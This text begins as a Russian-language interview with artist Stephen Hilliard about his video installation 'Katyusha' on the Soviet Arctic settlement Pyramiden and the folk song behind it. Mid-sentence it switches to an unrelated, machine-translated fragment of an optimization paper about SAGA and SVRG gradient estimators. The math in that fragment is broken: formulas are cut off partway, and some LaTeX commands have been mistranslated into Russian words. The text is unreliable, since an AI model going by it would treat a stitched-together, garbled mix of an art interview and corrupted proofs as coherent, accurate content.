Меня привлекла сложность и амбивалентность истории Пирамиды. Это было искусственное сообщество, созданное в особо негостеприимном месте в качестве пешки в холодной войне. В то же время у многих бывших жителей остались очень теплые и счастливые воспоминания о жизни здесь. У них был относительно неплохой уровень жизни, в то же время они находились под постоянным наблюдением КГБ. Наиболее интересным для меня является сопоставление между «идеей» Пирамиды как идеального советского города (как это видно на рекламных щитах и ​​фресках, представленных в видео, или квадратных милях советской земли, которая была импортирована для выращивания травы в городе) и контраст с реальностью арктического аванпоста, который полностью зависит от тонкой линии жизни, ведущей «домой».

Остатки советской эпохи в Пирамиде.Предоставлено Стивеном Хильярдом

Как вы наткнулись на слова, которые находятся на обложке Катюша (Katyusha) ? И как эти строки связаны с историей Пирамиды?

Ролик начинается и заканчивается стихами из народной песни «Катюша». Это была национальная песня Советского Союза во время Второй мировой войны. Теперь это одна из самых известных песен в России, почти всегда поемая в приподнятом настроении с воинственным подтекстом. Часто исполняется в военной форме.Он навсегда связан с Великой Отечественной войной. На самом деле это песня о любви, спетая от лица Катюши, молодой девушки, скучающей по своему возлюбленному, солдату-пограничнику. Его история так же сложна, как Пирамида. Песня дала прозвище ракетной системе «Катюша», одной из самых эффективных систем вооружения Советского Союза во время Второй мировой войны. Вы можете найти ряд теорий относительно того, почему песня (которая была очень популярна в войсках) дала прозвище оружию. Мне хочется верить, что это название — часть черного юмора, взятая из третьего куплета песни, что примерно переводится:

.

Ах ты песня девы,
Направляйся к яркому солнцу.
И солдату на дальнем рубеже
Передай привет от Катюши.

Это имя до сих пор используется для описания мобильных систем запуска ракет, которые в настоящее время используются во всем мире. Я взял такое название для своего видео, потому что в песне есть и история влюбленных, и история серой птицы. Амбивалентность песни хорошо вписывается в сложную историю Пирамиды. Вы можете увидеть изображение грузовика с ракетой «Катюша» времен Второй мировой войны в одном из моментов видео, если внимательно присмотреться.

Что, по вашему мнению, люди вынесут из вашей инсталляции?

Ощущение сложности истории Пирамиды, особенно человеческого измерения этой истории. Я надеюсь, что это говорит о том, как мы все живем в структурах идей и идеалов, и о хрупкости такого существования.

Очевидно, что ваша инсталляция занимает видное место в рамках Висконсинской триеннале. Катюша (Катюша) особенно актуален для Висконсина? Как проект взаимодействует с Висконсином?

Моя цель в моем творчестве — исследовать темы, связанные с общим человеческим опытом, с вещами, которые связывают нас друг с другом.Вы могли бы назвать это обществом или культурой (маленькая с) в самом общем смысле. Имея это в виду, я надеюсь, что ни одна из моих работ не имеет особого отношения только к одному месту или социальной группе.

Courtesy Стивен Хильярд

Как вы познакомились с Русским народным оркестром UW (RFO)?

Я погуглил! Это привело меня к Виктору Городинскому, директору UW RFO, и другим музыкантам, которые так щедро отдавали свое время и навыки. Виктор познакомил меня с Ханной Губенковой, очень талантливой певицей, которая стала голосом Катюша (Katyusha) .Без голоса Ханны я не смог бы сделать это произведение.

Что вы имели в виду, когда работали с RFO над саундтреком/партитурой? Что вы надеялись, что музыка RFO добавит вашему проекту?

Звук — чрезвычайно важная часть любого фильма или видеоарта. Я считаю, что это не менее 50% опыта. Я хотел записать собственный саундтрек с русскоязычными музыкантами, которые не только знали песни, но и принадлежали к той культуре, которая их создала. Я надеялся, что это поможет связать мою историю о Пирамиде с ее истоками в России и Советском Союзе.Виктор и Ханна определенно привнесли это в проект таким образом, который очень хорошо сочетался с моим опытом Пирамиды, смесью меланхолии и страсти, которую я начинаю думать, что она является уникально русской. T \sigma _k.2}{8} + 4 \varTheta _1 \varTheta _2 + 4 c \left( \frac{1}{2} — \frac{c}{4} \right) \right) \end{aligned}$$

Ограничение

$$\begin{aligned} c \ge \frac{2}{2 — \rho _M + \rho _B \rho _M} \left( 1 + \sqrt{1 + 8 \varTheta _1 \varTheta _2 (2 — \rho _M + \rho _B \rho _M)} \right) \end{aligned}$$

гарантирует, что это квадратичное число в c неположительно. Для второго члена мы требуем \(\tau _k \le 1/2\) для всех k , что верно, потому что \(\tau _k = \frac{2}{k + \nu + 4} \le \ дробь{1}{2}\).2}{8} + 4 \varTheta _1 \varTheta _2 + 4 c \left( \frac{1}{2} — \frac{c}{4} \right) \right) , \end{aligned}$$

, который является неположительным из-за ограничений на c . Для второго члена все, что мы должны показать, это то, что \(1 — \tau \ge 1 / 2\). У нас есть \(\tau = \sqrt{\frac{\mu }{L c}} \le \frac{1}{\sqrt{c}}\), а c больше 4, поэтому ограничение \(c \ge 16 \varTheta _1 \varTheta _2\) гарантирует, что второй член в (13) неположителен.

Случай 3. В теореме 2 вместо этого предположим, что \(\frac{\rho }{2 \mu } \le \frac{1}{\sqrt{\mu L c}}\), так что \ (\ gamma = \ frac {\ rho} {2 \ mu} \) и \ (\ tau = \ frac {\ rho } {2} \).2} — \frac{1}{2 \mu } \le \frac{8 \varTheta _1 \varTheta _2}{c \mu } — \frac{1}{2 \mu } \le 0, \end{aligned }$$

где последнее неравенство следует из того, что \(c \ge 16 \varTheta _1 \varTheta _2\).

Доказательства для SAGA и SVRG

Наши результаты для SAGA и SVRG требуют следующей леммы, которая появляется также как [31, Lem. 7].

Лемма 8

Предположим, что \(X_1, \ldots , X_t\) являются независимыми случайными величинами, удовлетворяющими \(\mathbb {E}_kX_i = 0\) для всех i .2}\), \(M_2 = 0\) и \(\rho _F = 1\). Поскольку оценщик градиента SAGA непредвзят, мы можем четко установить \(\rho _B = 1\), доказывая утверждение. \(\квадрат\)

Аналогичный результат справедлив для средства оценки градиента SVRG.